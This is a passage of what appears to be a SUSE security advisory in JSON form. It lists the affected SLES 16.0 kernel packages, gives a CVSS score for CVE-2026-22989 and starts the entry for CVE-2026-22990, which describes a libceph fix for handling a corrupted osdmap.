"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22989"
},
{
"cve": "CVE-2026-22990",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22990"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: replace overzealous BUG_ON in osdmap_apply_incremental()\n\nIf the osdmap is (maliciously) corrupted such that the incremental\nosdmap epoch is different from what is expected, there is no need to\nBUG. Instead, just declare the incremental osdmap to be invalid.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
